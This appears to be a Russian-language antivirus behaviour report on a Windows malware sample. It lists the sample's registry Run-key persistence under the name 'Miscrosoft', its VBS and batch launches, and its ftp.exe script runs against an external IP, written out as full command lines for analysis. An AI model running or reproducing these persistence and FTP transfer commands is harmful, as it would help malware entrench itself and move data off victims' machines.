Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Miscrosoft' = '%HOMEPATH%\save\launch.bat'
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\vanish.vbs"
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\error.vbs"
- '<SYSTEM32>\ftp.exe' -s:test2.txt 162.210.101.80
- '<SYSTEM32>\ftp.exe' -s:test.txt 162.210.101.80
- '<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Miscrosoft /d "%HOMEPATH%\save\launch.bat" /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\2.bat" <Полный путь к файлу>"
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\index.bat" "
- <SYSTEM32>\cmd.exe
- <Текущая директория>\%USERNAME%.co
- <Текущая директория>\vanish.vbs
- <Текущая директория>\test.txt
- <Текущая директория>\test2.txt
- <Текущая директория>\index.bat
- %TEMP%\1.tmp\2.bat
- <Текущая директория>\error.vbs
- <Текущая директория>\launch.bat
- %TEMP%\1.tmp\2.bat
- <Текущая директория>\error.vbs
- 'localhost':1042
- 'localhost':1044
- '16#.#10.101.80':21
- 'localhost':1040
- ClassName: 'Shell_TrayWnd' WindowName: ''